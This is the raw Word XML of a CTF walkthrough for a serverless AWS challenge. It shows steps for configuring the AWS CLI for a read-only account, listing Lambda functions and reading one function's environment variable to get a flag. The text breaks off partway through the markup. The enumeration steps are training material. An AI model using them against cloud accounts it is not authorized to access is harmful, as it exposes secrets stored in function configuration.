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668A3" w14:textId="4FFFB6BE" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="26DC84E7" w14:textId="77777777" w:rsidR="004E7BA1" w:rsidRDefault="004E7BA1" w:rsidP="004E7BA1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3539283B" w14:textId="1F33F220" w:rsidR="0094232C" w:rsidRPr="004E7BA1" w:rsidRDefault="0094232C" w:rsidP="004E7BA1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>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7BA1">
        <w:rPr>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Cloud Security CTF: Serverless Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABE6F3" w14:textId="02015EBC" w:rsidR="004E7BA1" w:rsidRDefault="004E7BA1" w:rsidP="004E7BA1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099C1091" w14:textId="77777777" w:rsidR="004E7BA1" w:rsidRDefault="004E7BA1" w:rsidP="004E7BA1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A02053" w14:textId="5BE0A753" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="54801057" w14:textId="77777777" w:rsidR="00CC4E42" w:rsidRPr="0094232C" w:rsidRDefault="00CC4E42" w:rsidP="0094232C"/>
    <w:p w14:paraId="58C0BB14" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> ​Collect all 7 FLAGs named: ServerlessFLAG1, ServerlessFLAG2, ServerlessFLAG3, ServerlessFLAG4 (Resource ARN), ServerlessFLAG5, ServerlessFLAG6 (Version) and ServerlessFLAG7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959B8E9" w14:textId="22FFDC86" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="4CBBCE28" w14:textId="77777777" w:rsidR="00CC4E42" w:rsidRDefault="00CC4E42" w:rsidP="0094232C"/>
    <w:p w14:paraId="74D5C70E" w14:textId="27051740" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Credentials Page: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842474A" w14:textId="19AF2D1A" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image51626368" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E1FBED" wp14:editId="1B26A59A">
            <wp:extent cx="1256030" cy="15875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193" name="Picture 193" descr="page2image5162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image5162636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56030" cy="15875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image66214192" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302DCAAF" wp14:editId="55BFC0EF">
            <wp:extent cx="5731432" cy="1176793"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="182" name="Picture 182" descr="page2image6621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2image66214192"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="26517" b="29877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1176809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image51626176" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70090E21" wp14:editId="76333DDB">
            <wp:extent cx="3275965" cy="15875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="189" name="Picture 189" descr="page2image5162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2image516261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75965" cy="15875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image51635200" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266FF71C" wp14:editId="002629FD">
            <wp:extent cx="1256030" cy="15875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188" name="Picture 188" descr="page2image5163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2image516352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6030" cy="15875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image51629056" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3067AF09" wp14:editId="273DC10B">
            <wp:extent cx="1256030" cy="15875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187" name="Picture 187" descr="page2image5162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image516290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6030" cy="15875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page2image51632704" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C335C5" wp14:editId="419FCDBB">
            <wp:extent cx="1256030" cy="15875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184" name="Picture 184" descr="page2image5163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2image5163270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56030" cy="15875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B5CE9B" w14:textId="5C156E22" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="3D2EE7E4" w14:textId="4B82F1FD" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="798A60C8" w14:textId="4CAFCBBF" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="0F28383B" w14:textId="1501DABF" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="0331846B" w14:textId="1DB1A4BC" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="43098C0D" w14:textId="604EB1B4" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="46041E35" w14:textId="2707AC99" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="6C753F26" w14:textId="69047F47" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="6C93A4FA" w14:textId="772CF105" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="122743BB" w14:textId="075E1A9A" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="402F4C3A" w14:textId="718C3571" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="2AEB313B" w14:textId="1BCC5D9B" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="0A2FCD7E" w14:textId="66EB0781" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="618BCA8F" w14:textId="4AE6C2F7" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="11D2509B" w14:textId="4C6AF9BD" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="3EFBA0AD" w14:textId="564FDE98" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="511B4D93" w14:textId="1F7BF0DF" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="70D46723" w14:textId="1F859889" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="63398C1F" w14:textId="31C15EA0" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="6257E009" w14:textId="31D95375" w:rsidR="00A507C5" w:rsidRDefault="00A507C5" w:rsidP="0094232C"/>
    <w:p w14:paraId="796382BF" w14:textId="77777777" w:rsidR="004E7BA1" w:rsidRDefault="004E7BA1" w:rsidP="0094232C"/>
    <w:p w14:paraId="7DA0E81A" w14:textId="77777777" w:rsidR="00DE67AE" w:rsidRDefault="00DE67AE" w:rsidP="0094232C"/>
    <w:p w14:paraId="26BD5531" w14:textId="549B56C9" w:rsidR="00DE67AE" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="005C0257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 1: ​ </w:t>
      </w:r>
      <w:r w:rsidR="00DE67AE">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">onfigure AWS CLI to interact with the read-only AWS account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA5B41B" w14:textId="46B61088" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page3image66502080" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082815E1" wp14:editId="0C6A4AC6">
            <wp:extent cx="5731510" cy="1050925"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="15875"/>
            <wp:docPr id="179" name="Picture 179" descr="page3image6650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3image665020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050925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5015B" w14:textId="77777777" w:rsidR="00DE67AE" w:rsidRPr="0094232C" w:rsidRDefault="00DE67AE" w:rsidP="0094232C"/>
    <w:p w14:paraId="51FB4D18" w14:textId="2E760B7D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="005C0257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 2: ​List the Lambda functions in the region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C97107" w14:textId="1EC50FD0" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page3image66495216" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04DC1AE8" wp14:editId="7B4D03E5">
            <wp:extent cx="5731510" cy="1760855"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17145"/>
            <wp:docPr id="178" name="Picture 178" descr="page3image6649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3image664952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760855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC6A9E" w14:textId="5692F0E2" w:rsidR="004B3096" w:rsidRDefault="004B3096" w:rsidP="0094232C"/>
    <w:p w14:paraId="7337684D" w14:textId="77777777" w:rsidR="004B3096" w:rsidRPr="0094232C" w:rsidRDefault="004B3096" w:rsidP="004B3096">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There are five lambda functions, the environment variable of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3B27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>my-serverless-flag</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function reveals the first flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5B2BD" w14:textId="6F983DEA" w:rsidR="00EB3B27" w:rsidRDefault="004B3096" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>ServerlessFLAG1: ​4f5d31df0980432b548edd5c6de2e14c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01F52E" w14:textId="583E794D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="000A6D95" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FC06FF6" wp14:editId="3082DF6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1530000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>150424</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1091520" cy="18360"/>
                <wp:effectExtent l="88900" t="139700" r="90170" b="134620"/>
                <wp:wrapNone/>
                <wp:docPr id="202" name="Ink 202"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId11">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1091520" cy="18360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="6EAB11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2" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:116.2pt;margin-top:3.35pt;width:94.45pt;height:1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">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D5DB8F6" wp14:editId="30FF4452">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1068480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1803544</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2873520" cy="30240"/>
                <wp:effectExtent l="88900" t="139700" r="85725" b="135255"/>
                <wp:wrapNone/>
                <wp:docPr id="201" name="Ink 201"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId13">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2873520" cy="30240"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7D9224CB" id="Ink 201" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:79.95pt;margin-top:133.5pt;width:234.75pt;height:19.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">
                <v:imagedata r:id="rId14"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page4image66208160" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC5F8FF" wp14:editId="73D604B6">
            <wp:extent cx="5731510" cy="3001010"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8890"/>
            <wp:docPr id="173" name="Picture 173" descr="page4image6620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4image662081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01010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52824C57" w14:textId="77777777" w:rsidR="000A6D95" w:rsidRDefault="000A6D95" w:rsidP="0094232C"/>
    <w:p w14:paraId="6E4F430B" w14:textId="77777777" w:rsidR="009B3034" w:rsidRDefault="0094232C" w:rsidP="009B3034">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 3: ​Get more details about the my-serverless-flag function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04491162" w14:textId="5999B96A" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="006F2761">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2761">
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: ​aws lambda get-function --function-name my-serverless-flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AFE3B" w14:textId="77777777" w:rsidR="006F2761" w:rsidRPr="006F2761" w:rsidRDefault="006F2761" w:rsidP="006F2761">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA241CB" w14:textId="32C496E5" w:rsidR="009B3034" w:rsidRDefault="006F2761" w:rsidP="009B3034">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30EB69E0" wp14:editId="21AB0981">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1458360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2807805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1903320" cy="185040"/>
                <wp:effectExtent l="88900" t="139700" r="116205" b="145415"/>
                <wp:wrapNone/>
                <wp:docPr id="211" name="Ink 211"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId16">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1903320" cy="185040"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0FDF63E8" id="Ink 211" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:110.6pt;margin-top:212.6pt;width:158.35pt;height:31.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">
                <v:imagedata r:id="rId17" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
